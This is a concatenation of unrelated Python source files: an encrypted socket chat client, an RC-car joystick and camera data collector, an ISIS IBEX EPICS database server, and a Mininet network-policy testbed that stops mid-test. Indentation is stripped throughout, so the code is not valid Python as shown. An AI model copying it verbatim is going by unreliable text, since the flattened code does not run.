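#   keylength = 16
#   debug = false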
def parse_args():
parser = argparse.ArgumentParser(description='Connect to a dedicated server.\nAll settings here override the config file.')
parser.add_argument('-p', '--port', type=int, help='Specify the port number to connect to.', action='store')
parser.add_argument('-sA', '--serveraddress', type=str, help='Specify the server address to connect to.', action='store')
parser.add_argument('-kL', '--keylength', type=int, help='Specify the AES key length.', action='store')
parser.add_argument('-nE', '--noencryption', help='Specify this to disable encryption.', action='store_true')
parser.add_argument('-pK', '--publickey', type=str, help='Specify the public key to use when connecting to the server.', action='store')
parser.add_argument('-c', '--config', type=str, help='Specify the config file to use.', action='store')
parser.add_argument('-d', '--debug', help=argparse.SUPPRESS, action='store_true')
args = parser.parse_args()
global publicKeyFile, port, do_encrypt, debug, server_address, key_length, config_file
if args.config:
config_file = args.config
parse_config()
if args.publickey:
publicKeyFile = args.publickey
if args.noencryption:
do_encrypt = not args.noencryption
if args.port:
port = args.port
if args.serveraddress:
server_address = args.serveraddress
if args.keylength:
key_length = args.keylength
if args.debug:
debug = args.debug
def decryptRSA(encrypted):
decryptor = PKCS1_OAEP.new(privateKey)
decrypted = decryptor.decrypt(ast.literal_eval(str(encrypted)))
return decrypted
def encryptRSA(decrypted):
encryptor = PKCS1_OAEP.new(publicKey)
encrypted = encryptor.encrypt(decrypted)
return encrypted
def decryptAES(encrypted, key):
decryptor = AESCipher(key)
decrypted = decryptor.decrypt(encrypted)
return decrypted
def encryptAES(decrypted, key):
encryptor = AESCipher(key)
encrypted = encryptor.encrypt(decrypted)
return encrypted
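# Handshake sketch, as wired up in __main__ below: the client draws a random AES
# session key, protects it with the server's RSA public key via encryptRSA(),
# sends it once, and from then on every message goes through encryptAES() /
# decryptAES() with that session key.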
def sendToServer(message):
message = message.encode('utf-8')
if do_encrypt:
encMessage = encryptAES(message, key)
s.send(encMessage)
else:
s.send(message)
def clear():
if os.name == 'nt':
_ = os.system('cls')
else:
_ = os.system('clear')
def numberOfLines(message):
return (len(message) // shutil.get_terminal_size().columns) + 1
def listen():
while True:
try:
if do_encrypt:
inMessageEnc = s.recv(1024)
inMessage = decryptAES(inMessageEnc, key).decode('utf-8')
                if inMessage == 'Encryption is not allowed here.':
print("Encryption is not allowed here, sorry.")
raise
else:
inMessage = s.recv(1024).decode('utf-8')
except Exception as err:
if debug:
print(err)
s.close()
exit()
print('\r\x1b[2K{}'.format(inMessage))
print("{}> ".format(name), end="", flush=True)
if __name__ == "__main__":
print("CLIENT")
config_file = 'client.ini'
parse_config()
parse_args()
if debug:
print("DEBUG")
#if not os.path.exists(publicKeyFile):
# print("Downloading public RSA key.")
# urllib.request.urlretrieve("http://{}/{}".format(server_address, publicKeyFile), publicKeyFile)
if do_encrypt:
with open(publicKeyFile, "r") as file:
publicKeyString = file.read()
publicKey = RSA.import_key(publicKeyString)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
colorama.init()
erase = '\x1b[1A\x1b[2K'
name = input("Your username: ")
try:
print("Connecting...\r", end="")
s.connect((server_address, port))
if do_encrypt:
key = os.urandom(key_length)
keyEnc = encryptRSA(key)
s.send(keyEnc)
print("Connected with AES.")
sendToServer(name)
if do_encrypt:
connectedEnc = s.recv(1024).decode('utf-8')
connected = decryptAES(connectedEnc, key).decode('utf-8')
else:
connected = s.recv(1024).decode('utf-8')
print(connected)
Thread(target=listen).start()
while True:
try:
outMessage = input("{}> ".format(name))
except KeyboardInterrupt:
print("\nOkay, bye.")
s.close()
exit()
if outMessage == "exit" or outMessage == "quit":
break
outMessageCombo = "{}> {}".format(name, outMessage)
print((erase * numberOfLines(outMessageCombo)) + outMessageCombo)
if outMessage == "cls" or outMessage == "clear":
clear()
continue
sendToServer(outMessage)
except Exception as err:
print("Cannot Connect To Server")
print("Check Configuration and Try Again")
if debug:
print(err)
finally:
try:
sendToServer('I am out.')
except Exception as err:
if debug:
print(err)
s.close()
print("Connection Closed With Server")
|
My_Data_Coll_collect.py
|
"""
get image from camera:/dev/video2 424*240
rocker:/dev/input/jso
save the data ../data/img ../data/data.npy
"""
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import v4l2capture
import select
from ctypes import *
import struct, array
from fcntl import ioctl
import cv2
import numpy as np
import time
from sys import argv
import multiprocessing
import time
import getopt
path = os.path.split(os.path.realpath(__file__))[0]+"/.."
#script, vels = argv
opts,args = getopt.getopt(argv[1:],'-hH',['vels=','output=','serial=','camera=','save_name='])
#print(opts)
camera = multiprocessing.Array("b",range(50))#camera
serial = multiprocessing.Array("b",range(50))#serial
output_data = multiprocessing.Array("b",range(50))#output_data
Speed = multiprocessing.Array("i",range(2))#speed and ansgle (int)
camera.value = "/dev/video2"
output_data.value = "data"
Speed[0] = 1500
Speed[1] = 1500
serial.value = "/dev/ttyUSB0"
save_name="img"
#camera = "/dev/video0"
for opt_name,opt_value in opts:
if opt_name in ('-h','-H'):
print("python3 Data_Coll.py --vels=1560 --output=data --serial=/dev/ttyUSB0 --camera=/dev/video0 --save_name=img ")
exit()
if opt_name in ('--vels'):
Speed[0] = int(opt_value)
if opt_name in ('--output'):
output_data.value = opt_value
if opt_name in ('--serial'):
serial.value = opt_value
if opt_name in ('--camera'):
camera.value = opt_value
print("camera.value=",camera.value)
if opt_name in ('--save_name'):
save_name = opt_value
print("save_name=",save_name)
'''Create a mutex lock; by default it is not locked.'''
lock = multiprocessing.Manager().Lock()
#a = multiprocessing.Value("i",0)
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
#print("----- new folder -----")
#else:
#print('----- there is this folder -----')
def getvalue():
import os, struct, array
from fcntl import ioctl
    print('available devices')
for fn in os.listdir('/dev/input'):
if fn.startswith('js'):
print('/dev/input/%s' % fn)
axis_states = {}
button_states = {}
axis_names = {
0x00 : 'x',
0x01 : 'y',
0x02 : 'z',
0x03 : 'rx',
0x04 : 'ry',
0x05 : 'rz',
0x06 : 'trottle',
0x07 : 'rudder',
0x08 : 'wheel',
0x09 : 'gas',
0x0a : 'brake',
0x10 : 'hat0x',
0x11 : 'hat0y',
0x12 : 'hat1x',
0x13 : 'hat1y',
0x14 : 'hat2x',
0x15 : 'hat2y',
0x16 : 'hat3x',
0x17 : 'hat3y',
0x18 : 'pressure',
0x19 : 'distance',
0x1a : 'tilt_x',
0x1b : 'tilt_y',
0x1c : 'tool_width',
0x20 : 'volume',
0x28 : 'misc',
}
button_names = {
0x120 : 'trigger',
0x121 : 'thumb',
0x122 : 'thumb2',
0x123 : 'top',
0x124 : 'top2',
0x125 : 'pinkie',
0x126 : 'base',
0x127 : 'base2',
0x128 : 'base3',
0x129 : 'base4',
0x12a : 'base5',
0x12b : 'base6',
0x12f : 'dead',
0x130 : 'a',
0x131 : 'b',
0x132 : 'c',
0x133 : 'x',
0x134 : 'y',
0x135 : 'z',
0x136 : 'tl',
0x137 : 'tr',
0x138 : 'tl2',
0x139 : 'tr2',
0x13a : 'select',
0x13b : 'start',
0x13c : 'mode',
0x13d : 'thumbl',
0x13e : 'thumbr',
0x220 : 'dpad_up',
0x221 : 'dpad_down',
0x222 : 'dpad_left',
0x223 : 'dpad_right',
# XBox 360 controller uses these codes.
0x2c0 : 'dpad_left',
0x2c1 : 'dpad_right',
0x2c2 : 'dpad_up',
0x2c3 : 'dpad_down',
}
axis_map = []
button_map = []
fn = '/dev/input/js0'
jsdev = open(fn, 'rb')
buf = array.array('u',str(['\0']*5))
ioctl(jsdev, 0x80006a13 + (0x10000 * len(buf)), buf)
js_name = buf.tostring()
#js_name = buf.tobytes().decode('utf-8')
#print('device name: %s' % js_name)
# get number of axes and buttons
buf = array.array('B', [0])
ioctl(jsdev, 0x80016a11, buf) # JSIOCGAXES
num_axes = buf[0]
buf = array.array('B', [0])
ioctl(jsdev, 0x80016a12, buf) # JSIOCGBUTTONS
num_buttons = buf[0]
# Get the axis map
buf = array.array('B', [0] * 0x40)
ioctl(jsdev, 0x80406a32, buf) #JSIOCGAXMAP
for axis in buf[:num_axes]:
#print(axis)
        axis_name = axis_names.get(axis, 'unknown(0x%02x)' % axis)
axis_map.append(axis_name)
axis_states[axis_name] = 0.0
# Get the button map.
buf = array.array('H', [0] * 200)
ioctl(jsdev, 0x80406a34, buf) # JSIOCGBTNMAP
for btn in buf[:num_buttons]:
btn_name = button_names.get(btn, 'unknown(0x%03x)' % btn)
button_map.append(btn_name)
button_states[btn_name] = 0
return axis_map, axis_states,button_map,button_states
def save_image_process(lock,n,status,start,Camera):
global path
global save_name
mkdir(path+"/data")
mkdir(path+"/data/"+save_name)
video = v4l2capture.Video_device(Camera.value)
video.set_format(424,240, fourcc='MJPG')
video.create_buffers(1)
video.queue_all_buffers()
video.start()
imgInd = 0
print("Wait Start!")
while(start.value == False):
pass
while status.value:#PS2 tr or tl control stop
while start.value: # When the car is suspended, do not save.
select.select((video,), (), ())
image_data = video.read_and_queue()
frame = cv2.imdecode(np.frombuffer(image_data, dtype=np.uint8), cv2.IMREAD_COLOR)
cv2.imwrite(path+"/data/"+save_name+"/{}.jpg".format(imgInd), frame)
lock.acquire()
n.value = True
lock.release()
imgInd+=1
key = cv2.waitKey(1)
if key & 0xFF == ord('q'):
break
def save_data_process(lock,n,data,run):
file_write = open(path + "/data/" + output_data.value + ".txt", "a")
while run.value:
while(n.value):
lock.acquire()
n.value = False
lock.release()
# Default_file_write
file_write.write(str(data[1]))
file_write.write("\n")
file_write.flush()
def control_car_process(data,status,run,start):
max_num = 2100
min_num = 700
while run.value:
speed_car = data[0]
angle_car = data[1]
fn = '/dev/input/js0'
jsdev = open(fn, 'rb')
car = serial.value
axis_map, axis_states, button_map, button_states = getvalue()
lib_path = path + "/lib" + "/libart_driver.so"
so = cdll.LoadLibrary
lib = so(lib_path)
try:
if (lib.art_racecar_init(38400, car.encode("utf-8")) < 0):
# raise Exception("init_error!")
pass
lib.send_cmd(1500, 1500)
while run.value:
evbuf = jsdev.read(8)
if evbuf:
time, value, type, number = struct.unpack('IhBB', evbuf)
if type & 0x01:
button = button_map[number]
if button:
button_states[button] = value
if(button == 'tl2' and button_states[button] == True):
# print("Low Speed")
start.value = True
speed_car = 1580
lib.send_cmd(speed_car, angle_car)
if(button == 'tr2' and button_states[button] == True):
# print("High Speed")
start.value = True
speed_car = 1600
lib.send_cmd(speed_car, angle_car)
if(button == "b" and button_states[button] == True):
# Pause
# print("Pause")
start.value = False
speed_car = 1500
angle_car = 1500
lib.send_cmd(speed_car, angle_car)
if(button == 'x' and button_states[button] == True):
# Stop
print("Stop")
status.value = False
speed_car = 1500
angle_car = 1500
lib.send_cmd(speed_car, angle_car)
# save data
data[0] = speed_car
data[1] = angle_car
if(start.value == True):#PS2 control speed and angle start
if type & 0x02:
axis = axis_map[number]
if axis:
if(axis == "x" or axis == 'z'):
if value > 0:
angle_car = 700
elif value < 0:
angle_car = 2300
else:
angle_car = 1500
lib.send_cmd(speed_car, angle_car)
# save data
data[0] = speed_car
data[1] = angle_car
except:
print("car run error")
finally:
lib.send_cmd(1500, 1500)
print("car run finally")
def txt_2_numpy():
angledata = []
data = []
file = open(path+"/data/"+ output_data.value+".txt","r")
for line in file.readlines():
line = line.strip('\n')
angledata.append(int(line))
angle = np.array(angledata)
np.save(path+"/data/"+ output_data.value+".npy", angle,False)
file.close()
if __name__ == '__main__':
Flag_save_data = multiprocessing.Value("i",False)#New img save flag
Status = multiprocessing.Value("i",True)#Run or Stop for PS2
START = multiprocessing.Value("i",False)#START
RUN = multiprocessing.Value("i",True)#SHUTDOWN
try:
process_car = multiprocessing.Process(target=control_car_process,args=(Speed,Status,RUN,START))
process_image = multiprocessing.Process(target=save_image_process,args=(lock,Flag_save_data,Status,START,camera,))
process_data = multiprocessing.Process(target=save_data_process,args=(lock,Flag_save_data,Speed,RUN,))
process_car.start()
process_image.start()
process_data.start()
while(1):
if(Status.value == 0):
time.sleep(1)
RUN.value = False
txt_2_numpy()
break
except:
RUN.value = False
print("error")
finally:
RUN.value = False
# print("finally")
|
database_server.py
|
from __future__ import print_function, absolute_import, division, unicode_literals
# This file is part of the ISIS IBEX application.
# Copyright (C) 2012-2016 Science & Technology Facilities Council.
# All rights reserved.
#
# This program is distributed in the hope that it will be useful.
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License v1.0 which accompanies this distribution.
# EXCEPT AS EXPRESSLY SET FORTH IN THE ECLIPSE PUBLIC LICENSE V1.0, THE PROGRAM
# AND ACCOMPANYING MATERIALS ARE PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND. See the Eclipse Public License v1.0 for more details.
#
# You should have received a copy of the Eclipse Public License v1.0
# along with this program; if not, you can obtain a copy from
# https://www.eclipse.org/org/documents/epl-v10.php or
# http://opensource.org/licenses/eclipse-1.0.php
# Add root path for access to server_commons
import os
import traceback
import six
import sys
import json
import argparse
import codecs
from functools import partial
from pcaspy import Driver
from time import sleep
from threading import Thread, RLock
sys.path.insert(0, os.path.abspath(os.environ["MYDIRBLOCK"]))
from DatabaseServer.exp_data import ExpData, ExpDataSource
from DatabaseServer.procserv_utils import ProcServWrapper
from DatabaseServer.options_holder import OptionsHolder
from DatabaseServer.options_loader import OptionsLoader
from genie_python.mysql_abstraction_layer import SQLAbstraction
from server_common.utilities import compress_and_hex, print_and_log, set_logger, convert_to_json, \
dehex_and_decompress, char_waveform
from server_common.channel_access_server import CAServer
from server_common.constants import IOCS_NOT_TO_STOP
from server_common.ioc_data import IOCData
from server_common.ioc_data_source import IocDataSource
from server_common.pv_names import DatabasePVNames as DbPVNames
from server_common.loggers.isis_logger import IsisLogger
set_logger(IsisLogger())
MACROS = {
"$(MYPVPREFIX)": os.environ['MYPVPREFIX'],
"$(EPICS_KIT_ROOT)": os.environ['EPICS_KIT_ROOT'],
"$(ICPCONFIGROOT)": os.environ['ICPCONFIGROOT']
}
LOG_TARGET = "DBSVR"
INFO_MSG = "INFO"
MAJOR_MSG = "MAJOR"
class DatabaseServer(Driver):
"""
The class for handling all the static PV access and monitors etc.
"""
def __init__(self, ca_server: CAServer, ioc_data: IOCData, exp_data: ExpData, options_folder: str,
blockserver_prefix: str, test_mode: bool = False):
"""
Constructor.
Args:
ca_server: The CA server used for generating PVs on the fly
ioc_data: The data source for IOC information
exp_data: The data source for experiment information
options_folder: The location of the folder containing the config.xml file that holds IOC options
blockserver_prefix: The PV prefix to use
test_mode: Enables starting the server in a mode suitable for unit tests
"""
if not test_mode:
super(DatabaseServer, self).__init__()
self._blockserver_prefix = blockserver_prefix
self._ca_server = ca_server
self._options_holder = OptionsHolder(options_folder, OptionsLoader())
self._pv_info = self._generate_pv_acquisition_info()
self._iocs = ioc_data
self._ed = exp_data
if self._iocs is not None and not test_mode:
# Start a background thread for keeping track of running IOCs
self.monitor_lock = RLock()
monitor_thread = Thread(target=self._update_ioc_monitors, args=())
monitor_thread.daemon = True # Daemonise thread
monitor_thread.start()
def _generate_pv_acquisition_info(self) -> dict:
"""
Generates information needed to get the data for the DB PVs.
Returns:
Dictionary containing the information to get the information for the PVs
"""
enhanced_info = DatabaseServer.generate_pv_info()
def add_get_method(pv, get_function):
enhanced_info[pv]['get'] = get_function
add_get_method(DbPVNames.IOCS, self._get_iocs_info)
add_get_method(DbPVNames.HIGH_INTEREST, partial(self._get_interesting_pvs, "HIGH"))
add_get_method(DbPVNames.MEDIUM_INTEREST, partial(self._get_interesting_pvs, "MEDIUM"))
add_get_method(DbPVNames.LOW_INTEREST, partial(self._get_interesting_pvs, "LOW"))
add_get_method(DbPVNames.FACILITY, partial(self._get_interesting_pvs, "FACILITY"))
add_get_method(DbPVNames.ACTIVE_PVS, self._get_active_pvs)
add_get_method(DbPVNames.ALL_PVS, partial(self._get_interesting_pvs, ""))
add_get_method(DbPVNames.SAMPLE_PARS, self._get_sample_par_names)
add_get_method(DbPVNames.BEAMLINE_PARS, self._get_beamline_par_names)
add_get_method(DbPVNames.USER_PARS, self._get_user_par_names)
add_get_method(DbPVNames.IOCS_NOT_TO_STOP, DatabaseServer._get_iocs_not_to_stop)
return enhanced_info
@staticmethod
def generate_pv_info() -> dict:
"""
Generates information needed to construct PVs. Must be consumed by Server before
DatabaseServer is initialized so must be static
Returns:
Dictionary containing the information to construct PVs
"""
pv_size_256k = 256000
pv_size_10k = 10000
pv_info = {}
for pv in [DbPVNames.IOCS, DbPVNames.HIGH_INTEREST, DbPVNames.MEDIUM_INTEREST, DbPVNames.LOW_INTEREST,
DbPVNames.FACILITY, DbPVNames.ACTIVE_PVS, DbPVNames.ALL_PVS, DbPVNames.IOCS_NOT_TO_STOP]:
pv_info[pv] = char_waveform(pv_size_256k)
for pv in [DbPVNames.SAMPLE_PARS, DbPVNames.BEAMLINE_PARS, DbPVNames.USER_PARS]:
pv_info[pv] = char_waveform(pv_size_10k)
return pv_info
def get_data_for_pv(self, pv: str) -> bytes:
"""
Get the data for the given pv name.
Args:
            pv: The name of the PV to get the data for.
        Returns:
The data, compressed and hexed.
"""
data = self._pv_info[pv]['get']()
data = compress_and_hex(six.text_type(json.dumps(data)))
self._check_pv_capacity(pv, len(data), self._blockserver_prefix)
return data
def read(self, reason: str) -> str:
"""
A method called by SimpleServer when a PV is read from the DatabaseServer over Channel Access.
Args:
reason: The PV that is being requested (without the PV prefix)
Returns:
A compressed and hexed JSON formatted string that gives the desired information based on reason.
"""
return self.get_data_for_pv(reason) if reason in self._pv_info.keys() else self.getParam(reason)
def write(self, reason: str, value: str) -> bool:
"""
A method called by SimpleServer when a PV is written to the DatabaseServer over Channel Access.
Args:
reason: The PV that is being requested (without the PV prefix)
value: The data being written to the 'reason' PV
Returns:
True
"""
try:
if reason == 'ED:RBNUMBER:SP':
self._ed.update_experiment_id(value)
elif reason == 'ED:USERNAME:SP':
self._ed.update_username(dehex_and_decompress(value.encode('utf-8')).decode('utf-8'))
except Exception as e:
value = compress_and_hex(convert_to_json("Error: " + str(e)))
print_and_log(str(e), MAJOR_MSG)
# store the values
self.setParam(reason, value)
return True
def _update_ioc_monitors(self) -> None:
"""
Updates all the PVs that hold information on the IOCS and their associated PVs.
"""
while True:
if self._iocs is not None:
self._iocs.update_iocs_status()
for pv in [DbPVNames.IOCS, DbPVNames.HIGH_INTEREST, DbPVNames.MEDIUM_INTEREST, DbPVNames.FACILITY,
DbPVNames.ACTIVE_PVS, DbPVNames.ALL_PVS]:
encoded_data = self.get_data_for_pv(pv)
# No need to update monitors if data hasn't changed
if not self.getParam(pv) == encoded_data:
self.setParam(pv, encoded_data)
# Update them
with self.monitor_lock:
self.updatePVs()
sleep(1)
def _check_pv_capacity(self, pv: str, size: int, prefix: str) -> None:
"""
Check the capacity of a PV and write to the log if it is too small.
Args:
pv: The PV that is being requested (without the PV prefix)
size: The required size
prefix: The PV prefix
"""
if size > self._pv_info[pv]['count']:
print_and_log("Too much data to encode PV {0}. Current size is {1} characters but {2} are required"
.format(prefix + pv, self._pv_info[pv]['count'], size),
MAJOR_MSG, LOG_TARGET)
def _get_iocs_info(self) -> dict:
iocs = self._iocs.get_iocs()
options = self._options_holder.get_config_options()
for iocname in iocs.keys():
if iocname in options:
iocs[iocname].update(options[iocname])
return iocs
def _get_pvs(self, get_method: callable, replace_pv_prefix: bool, *get_args: list) -> list:
"""
Method to get pv data using the given method called with the given arguments and optionally remove instrument
prefixes from pv names.
Args:
get_method: The method used to get pv data.
replace_pv_prefix: True to remove pv prefixes, False if not.
get_args: The arguments to be applied to get_method.
Returns:
a list of names of pvs.
"""
if self._iocs is not None:
pv_data = get_method(*get_args)
if replace_pv_prefix:
pv_data = [p.replace(MACROS["$(MYPVPREFIX)"], "") for p in pv_data]
return pv_data
else:
return []
def _get_interesting_pvs(self, level) -> list:
"""
Gets interesting pvs of the current instrument.
Args:
            level: The interest level of the PVs; can be high, medium, low or facility. If level is an empty
                string, all interesting PVs of all levels are returned.
Returns:
a list of names of pvs with given level of interest.
"""
return self._get_pvs(self._iocs.get_interesting_pvs, False, level)
def _get_active_pvs(self) -> list:
"""
Gets all pvs belonging to IOCs that are currently running on the current instrument.
Returns:
a list of names of pvs.
"""
return self._get_pvs(self._iocs.get_active_pvs, False)
def _get_sample_par_names(self) -> list:
"""
Returns the sample parameters from the database, replacing the MYPVPREFIX macro.
Returns:
A list of sample parameter names, an empty list if the database does not exist
"""
return self._get_pvs(self._iocs.get_sample_pars, True)
def _get_beamline_par_names(self) -> list:
"""
Returns the beamline parameters from the database, replacing the MYPVPREFIX macro.
Returns:
A list of beamline parameter names, an empty list if the database does not exist
"""
return self._get_pvs(self._iocs.get_beamline_pars, True)
def _get_user_par_names(self) -> list:
"""
Returns the user parameters from the database, replacing the MYPVPREFIX macro.
Returns:
A list of user parameter names, an empty list if the database does not exist
"""
return self._get_pvs(self._iocs.get_user_pars, True)
@staticmethod
def _get_iocs_not_to_stop() -> list:
"""
Get the IOCs that are not to be stopped.
Returns:
A list of IOCs not to stop
"""
return IOCS_NOT_TO_STOP
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-bs', '--blockserver_prefix', nargs=1, type=str,
default=[MACROS["$(MYPVPREFIX)"]+'CS:'],
help='The prefix for PVs served by the blockserver(default=%MYPVPREFIX%CS:)')
parser.add_argument('-od', '--options_dir', nargs=1, type=str, default=['.'],
help='The directory from which to load the configuration options(default=current directory)')
args = parser.parse_args()
BLOCKSERVER_PREFIX = args.blockserver_prefix[0]
if not BLOCKSERVER_PREFIX.endswith(':'):
BLOCKSERVER_PREFIX += ":"
BLOCKSERVER_PREFIX = BLOCKSERVER_PREFIX.replace('%MYPVPREFIX%', MACROS["$(MYPVPREFIX)"])
print_and_log("BLOCKSERVER PREFIX = %s" % BLOCKSERVER_PREFIX, INFO_MSG, LOG_TARGET)
OPTIONS_DIR = os.path.abspath(args.options_dir[0])
print_and_log("OPTIONS DIRECTORY = %s" % OPTIONS_DIR, INFO_MSG, LOG_TARGET)
if not os.path.isdir(os.path.abspath(OPTIONS_DIR)):
# Create it then
os.makedirs(os.path.abspath(OPTIONS_DIR))
SERVER = CAServer(BLOCKSERVER_PREFIX)
SERVER.createPV(BLOCKSERVER_PREFIX, DatabaseServer.generate_pv_info())
SERVER.createPV(MACROS["$(MYPVPREFIX)"], ExpData.EDPV)
# Initialise IOC database connection
try:
ioc_data = IOCData(IocDataSource(SQLAbstraction("iocdb", "iocdb", "$iocdb")), ProcServWrapper(),
MACROS["$(MYPVPREFIX)"])
print_and_log("Connected to IOCData database", INFO_MSG, LOG_TARGET)
except Exception as e:
ioc_data = None
print_and_log("Problem initialising IOCData DB connection: {}".format(traceback.format_exc()),
MAJOR_MSG, LOG_TARGET)
# Initialise experimental database connection
try:
exp_data = ExpData(MACROS["$(MYPVPREFIX)"], ExpDataSource())
print_and_log("Connected to experimental details database", INFO_MSG, LOG_TARGET)
except Exception as e:
exp_data = None
print_and_log("Problem connecting to experimental details database: {}".format(traceback.format_exc()),
MAJOR_MSG, LOG_TARGET)
DRIVER = DatabaseServer(SERVER, ioc_data, exp_data, OPTIONS_DIR, BLOCKSERVER_PREFIX)
# Process CA transactions
while True:
try:
SERVER.process(0.1)
except Exception as err:
print_and_log(traceback.format_exc(), MAJOR_MSG)
break
|
EndpointTP_testbed.py
|
#!/usr/bin/python3
from mininet.net import Mininet
from mininet.node import Controller, OVSSwitch, RemoteController, OVSKernelSwitch, IVSSwitch, UserSwitch
from mininet.link import Link, TCLink
from mininet.cli import CLI
from mininet.log import setLogLevel
import time
import threading
from util.setup import SetupUtil
from util.test import TestUtil
from util.services import ServicesUtil
setup = SetupUtil()
test = TestUtil()
service = ServicesUtil()
class EndpointTPTestbed:
def __init__(self):
self.switches = []
self.controllers = []
self.gatewayTPs = []
self.hosts = []
topo = {
'Site 1':{
'tpAddr':'30.0.0.1',
'ip_range':'10.0.0.0/8',
'eTP_Port':6633,
'default_gw_name':'h1',
'default_gw':'10.0.0.1',
'site_switch':'s1',
'site_controller':'c1',
'Hosts':{
'h11':{
'ip':'10.0.1.2'
},
'h12':{
'ip':'10.1.0.3'
},
'h13':{
'ip':'10.2.0.4'
}
}
},
'Site 2':{
'tpAddr':'30.0.0.2',
'ip_range':'20.0.0.0/8',
'eTP_Port':6634,
'default_gw_name':'h2',
'default_gw':'20.0.0.1',
'site_switch':'s2',
'site_controller':'c2',
'Hosts':{
'h21':{
'ip':'20.0.1.2'
},
'h22':{
'ip':'20.2.0.3'
}
}
}
}
def topology(self):
"Create a network."
net = Mininet( controller=RemoteController, link=TCLink, switch=OVSKernelSwitch )
service.start_Mondrian_Controller()
for site in self.topo:
site_info = self.topo[site]
# Start Endpoint TP
service.start_Endpoint_TP(tpAddr=site_info['tpAddr'], endpointTPPort=site_info['eTP_Port'])
self.controllers.append((net.addController( site_info['site_controller'],ip='localhost',port=site_info['eTP_Port']),site))
# Start site Switch
self.switches.append((net.addSwitch(site_info['site_switch'], cls = OVSSwitch, protocols='OpenFlow13'),site))
# Start Gateway TP and connect to site Switch
self.gatewayTPs.append((net.addHost(site_info['default_gw_name'], ip=site_info['default_gw']),site))
net.addLink(self.gatewayTPs[-1][0], self.switches[-1][0])
# Start Hosts and connect to site Switch
hosts_info = site_info['Hosts']
for host in hosts_info:
self.hosts.append((net.addHost(host, ip=hosts_info[host]['ip']),site))
net.addLink(self.hosts[-1][0], self.switches[-1][0])
# Create full mesh between Gateway TPs
for i, g0 in zip(range(len(self.gatewayTPs)), self.gatewayTPs):
for j, g1 in zip(range(len(self.gatewayTPs)), self.gatewayTPs):
if j>i:
net.addLink(g0[0], g1[0])
print ("*** Starting network")
net.build()
print("*** Config the hosts")
for site in self.topo:
site_info = self.topo[site]
print("*** Config hosts of "+str(site))
for h in self.hosts:
if h[1]==site:
setup.set_up_interface(h[0], if_name='eth0', ip_addr=site_info['Hosts'][h[0].name]['ip'], net_mask='255.0.0.0')
setup.set_up_default_gw(h[0], gw=site_info['default_gw'])
print("*** Config Gateway TP of "+str(site))
for g in self.gatewayTPs:
if g[1]==site:
setup.set_up_interface(g[0], if_name='eth0', ip_addr=site_info['default_gw'], net_mask='255.0.0.0')
setup.set_up_interface(g[0], if_name='eth1', ip_addr=site_info['tpAddr'], net_mask='255.0.0.0')
setup.set_up_forwarding(g[0])
# Add routes to other Sites
for other_site in self.topo:
if other_site != site:
setup.set_up_route(host=g[0], dest=self.topo[other_site]['ip_range'], via=self.topo[other_site]['tpAddr'])
print("*** Start Controllers")
for c in self.controllers:
c[0].start()
print("*** Map Switches to Controllers")
for s in self.switches:
s[0].start([c[0] for c in self.controllers if c[1]==s[1]])
self.net = net
def test_intra_zone(self):
'''
Test if all connections work for intra zone traffic (Zone 1)
both intra and inter domain for the protocols TCP, UDP and ICMP
'''
test.prefix = "[Intra Zone Test] "
host_dict = self.get_host_dict()
success = True
print("*** Intra Zone Test started")
# ICMP
success = success and test.test_icmp(host_dict['h11'], host_dict['h12'])
success = success and test.test_icmp(host_dict['h11'], host_dict['h21'])
success = success and test.test_icmp(host_dict['h12'], host_dict['h11'])
success = success and test.test_icmp(host_dict['h12'], host_dict['h21'])
success = success and test.test_icmp(host_dict['h21'], host_dict['h11'])
success = success and test.test_icmp(host_dict['h21'], host_dict['h12'])
# TCP
success = success and test.test_tcp(host_dict['h11'], host_dict['h12'])
success = success and test.test_tcp(host_dict['h11'], host_dict['h21'])
success = success and test.test_tcp(host_dict['h12'], host_dict['h11'])
success = success and test.test_tcp(host_dict['h12'], host_dict['h21'])
success = success and test.test_tcp(host_dict['h21'], host_dict['h11'])
success = success and test.test_tcp(host_dict['h21'], host_dict['h12'])
# UDP
success = success and test.test_udp(host_dict['h11'], host_dict['h12'])
success = success and test.test_udp(host_dict['h11'], host_dict['h21'])
success = success and test.test_udp(host_dict['h12'], host_dict['h11'])
success = success and test.test_udp(host_dict['h12'], host_dict['h21'])
success = success and test.test_udp(host_dict['h21'], host_dict['h11'])
success = success and test.test_udp(host_dict['h21'], host_dict['h12'])
if success:
print("*** Intra Zone Test passed")
else:
print("*** Intra Zone Test failed")
test.prefix = ""
def test_inter_zone(self):
'''
        Test that connections work for inter-zone traffic for which
        there is a policy allowing that kind of traffic, and that
        they don't work if the policy disallows it.
'''
test.prefix = "[Inter Zone Test] "
host_dict = self.get_host_dict()
success = True
print("*** Inter Zone Test started")
#"PolicyID": 1, "Src": 1, "Dest": 2,"SrcPort": 70, "DestPort": 90, "Proto": "TCP", "Action": "forwarding"
success = success and not(test.test_tcp(src=host_dict['h11'], dest=host_dict['h13'], srcPort=70, destPort=90)) # Fail because for TCP established would be needed
#"PolicyID": 2, "Src": 2, "Dest": 1, "SrcPort": 70, "DestPort": 90, "Proto": "UDP", "Action": "forwarding"
success = success and test.test_udp(src=host_dict['h13'], dest=host_dict['h11'], srcPort=70, destPort=90) # OK
#"PolicyID": 3, "Src": 1, "Dest": 2, "SrcPort": 0, "DestPort": 0, "Proto": "TCP", "Action": "forwarding"
success = success and not(test.test_tcp(src=host_dict['h11'], dest=host_dict['h13'])) # Fail because for TCP established would be needed
#"PolicyID": 4, "Src": 3, "Dest": 0, "SrcPort": 0, "DestPort": 0, "Proto": "", "Action": "drop"
success = success and not(test.test_udp(src=host_dict['h22'], dest=host_dict['h13'])) # Fail because of drop action
success = success and not(test.test_udp(src=host_dict['h22'], dest=host_dict['h11'])) # Fail because of drop action
#"PolicyID": 5, "Src": 1, "Dest": 2, "SrcPort": 80, "DestPort": 100, "Proto": "TCP", "Action": "established"
success = success and test.test_tcp(src=host_dict['h11'], dest=host_dict['h13'], srcPort=80, destPort=100) #OK
success = success and test.test_tcp(src=host_dict['h13'], dest=host_dict['h11'], srcPort=100, destPort=80) #OK
#"PolicyID": 6, "Src": 1, "Dest": 2, "SrcPort": 80, "DestPort": 0, "Proto": "TCP", "Action": "drop"
